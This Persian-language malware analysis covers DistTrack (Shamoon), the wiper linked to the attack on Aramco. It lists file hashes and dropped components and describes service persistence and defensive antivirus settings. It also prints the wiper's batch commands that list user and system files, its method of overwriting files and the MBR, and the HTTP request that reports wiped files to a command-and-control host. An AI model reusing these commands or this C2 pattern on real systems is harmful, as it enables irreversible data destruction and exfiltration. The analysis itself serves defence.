برخی کارشناسان امنیتی بدافزار DistTrack را نسخه جدیدی از بدافزاری میدانند که در ایران به وایپر مشهور شد و در نهایت منجر به کشف بدافزار فلیم شد.
بدافزار "DistTrack" از نوع بدافزارهای Trojan بوده و رفتار بسیار مخربی دارد. این بدافزار با رونویسی فایلها و بخش MBR و جایگزین کردن داده های آنها با داده های خراب، سبب از بین رفتن دائمی اطلاعات ذخیره شده بر روی دیسک می شود. W۳۲/DistTrack برای اولین بار در مرداد ماه سال جاری (۱۳۹۱) مشاهده شد.
نحوه انتشار اولیه این بدافزار هنوز مشخص نیست اما قابلیت انتشار از طریق Admin$ را دارد.
فایلهای اصلی مورد استفاده بدافزار DistTrack عبارتند از:
Filename : str.exe
Length : ۹۸۹۱۸۴ bytes
MD۵ : B۱۴۲۹۹FD۴D۱CBFB۴CC۷۴۸۶D۹۷۸۳۹۸۲۱۴
SHA۱ : ۷C۰DC۶A۸F۴D۲D۷۶۲A۰۷A۵۲۳F۱۹B۷ACD۲۲۵۸F۷ECC
Filename : str.exe
Length : ۹۸۹,۱۸۴ bytes
MD۵ : D۲۱۴C۷۱۷A۳۵۷FE۳A۴۵۵۶۱۰B۱۹۷C۳۹۰AA
SHA۱: ۵۰۲۹۲۰A۹۷E۰۱C۲D۰۲۲AC۴۰۱۶۰۱A۳۱۱۸۱۸F۳۳۶۵۴۲
This version does run however and results in the following files being dropped on the system.
Filename : netinit.exe
Length : ۱۳۳۱۲۰ bytes
MD۵ : ۴۱F۱۳۸۱۱FA۲D۴C۴۱B۸۰۰۲BFB۲۵۵۴A۲۸۶
SHA۱ : C۴۰۴CDC۹F۸۰۴B۵۶۵D۶۰B۲ADB۸۷C۹A۶B۷AFB۴۲B۹۰
Filename : dfrag.exe
Length : ۱۹۴۰۴۸ bytes
MD۵ : ۳B۷۴۰CCA۴۰۱۷۱۵۹۸۵F۳A۰C۲۸F۸۵۱B۶۰E
SHA۱ : ۵۷۵۲۸۹۸ABC۸۵۵۲۸D۵۰۷۳۹A۱EDC۸E۶FEED۰A۳E۱AD
Filename : drdisk.sys
Length : ۲۷۲۸۰ bytes
MD۵ : ۱۴۹۳D۳۴۲E۷A۳۶۵۵۳C۵۶B۲ADEA۱۵۰۹۴۹E
SHA۱ : CE۵۴۹۷۱۴A۱۱BD۴۳B۵۲BE۷۰۹۵۸۱C۶E۱۴۴۹۵۷۱۳۶EC
ظاهراً فایلهای اجرایی این بدافزار در ۱۹ مرداد ایجاد شده اند.
با اجرا شدن فایل اجرایی اولیه، بدافزار یک کپی از خود را با نام tsksvr.exe در مسیر SystemRoot\System۳۲ قرار می دهد. در ادامه، این فایل تحت یک سرویس با مشخصاتی که در شکل زیر نمایش داده شده است اجرا و فایل اولیه حذف می شود.
بدافزار DistTrackبا شروع به کار سرویس ایجاد شده، هر دو دقیقه یکبار یک فایل اجرایی با یکی از نامهای زیر بر روی سیستم قربانی کپی می شود:
caclsrv.exe, certutl.exe, clean.exe, ctrl.exe, dfrag.exe, dnslookup.exe, dvdquery.exe, event.exe, findfile.exe, gpget.exe, ipsecure.exe, iissrv.exe, msinit.exe, ntfrsutil.exe, ntdsutl.exe, power.exe, rdsadmin.exe, regsys.exe, sigver.exe, routeman.exe, rrasrv.exe, sacses.exe, sfmsc.exe, smbinit.exe, wcscript.exe, ntnw.exe, netx.exe, fsutl.exe, extract.exe,
همچنین این ویروس دارای یک بخش Wiper است که وظیفه رونویسی فایلهای دیسک سخت، MBR و Boot Sector را عهده دار است. این بخش فرامین زیر را اجرا می کند:
dir "C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i download >nul >f۱.inf
dir "C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i document >nul >>f۱.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i download >nul >>f۱.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i document >nul >>f۱.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i picture >nul >>f۱.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i video >nul >>f۱.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i music >nul >>f۱.inf
dir "C:\Documents and Settings\” /s /b /a:-D >nul | findstr -i desktop >nul >f۲.inf
dir C:\Users\ /s /b /a:-D >nul | findstr -i desktop >nul >>f۲.inf
dir C:\Windows\System۳۲\Drivers /s /b /a:-D >nul >>f۲.inf
dir C:\Windows\System۳۲\Config /s /b /a:-D >nul | findstr -v -i systemprofile >nul >>f۲.inf
dir f۱.inf /s /b >nul >>f۱.inf
dir f۲.inf /s /b >nul >>f۱.inf
نتیجه اجرای این فرامین، تهیه فهرستی از نام و مسیر فایلهایی است که در شاخه های Desktop، Documents، Download، Video، Music، Pictures قرار دارند. این فهرست در دو فایل به نامهای f۱.inf و f۲.inf ذخیره می شوند. در ادامه، یک کپی از فهرست فایلها در فایل زیر ذخیره می شود:
C:\WINDOWS\inf\netfb۳۱۸.pnf
سپس داده های این فایلها، با ۱۰۲۴ بایت اول یک فایل JPEG به طور مکرر جایگزین می شود. در این حالت، محتوای اصلی فایلها از بین رفته و غیرقابل برگشت می شوند.
همچنین بخش Wiper فایلی با نام drdisk.sys را بر روی سیستم آلوده کپی می کند که از آن برای رونویسی MBR و جداول پارتیشن دیسک استفاده می کند. داده هایی که برای رونویسی استفاده می شوند همانهایی هستند که در تصویر بالا نمایش داده شده است. این رونویسی سبب می شود که دیسک بعد از راه اندازی مجدد دستگاه به وسیله سیستم غیرقابل شناسایی شود.
در نهایت این بدافزار فهرستی از فایلهای رونویسی شده را از C:\WINDOWS\inf\netfb۳۱۸.pnf خوانده و اطلاعات را به مرکز فرماندهی (Command and Control) خود با مشخصات زیر ارسال می کند:
GET /ajax_modal/modal/data.asp?mydata=_۱CD&uid=۱۷۲.xxx.xxx.xxx&state=۹۳۲۳۸۵۹
HTTP/۱.۱
Connection: keep-alive
User-Agent: you
Host: ۱۰.۱.۲۵۲.۱۹
Pragma: no-cache
به روز نگه داشتن ضدویروس و همچنین استفاده از تنظیمات توصیه شده به وسیله کارشناسان (مانند فعال سازی قاعده Prevent remote creation/modification of executable and configuration files) در نرم افزار ضدویروس می تواند کامپیوتر را در مقابل این ویروس محافظت کند.
بدافزار DistTrack که اکنون به وسیله برخی شرکتهای ضدویروس "Shamoon" هم نامیده می شود، به احتمال قوی از طریق ایمیل و به صورت یک برنامه اجرایی مخفی شده در درون فایل پیوست (attachemnt) ایمیل، منتشر می شود. به نظر می رسد که این برنامه اجرایی از یک نقطه ضعف ناشناخته برای نفوذ به سیستم قربانی سوءاستفاده می کند.
با توجه به آمار آلودگی های گزارش شده، برخی شرکتهای ضدویروس اعتقاد دارند که هدف اصلی بدافزار DistTrack حوزه انرژی (نفت و گاز) است. از جمله، شرکت نفت عریستان سعودی (Aramco) مورد حمله این بدافزار قرار گرفته و طبق برخی اخبار غیرموثق، بخش های بزرگی از این شرکت نفتی دچار اختلال شده است و علاوه بر کامپیوتر پرسنل، سرورهای ایمیل و وب و همچنین Domain Controller مورد حمله و آسیب قرار گرفته اند.
برخی کارشناسان امنیتی این بدافزار را نسخه جدیدی از بدافزاری می دانند که در ایران به Wiper مشهور شد و در نهایت منجر به کشف بدافزار Flame شد. از طرف دیگر، برخی اعتقاد دارند که بدافزار DistTrack یک بدافزار جدید و مستقل است که در ساخت آن فقط از Wiper الهام گرفته شده است.
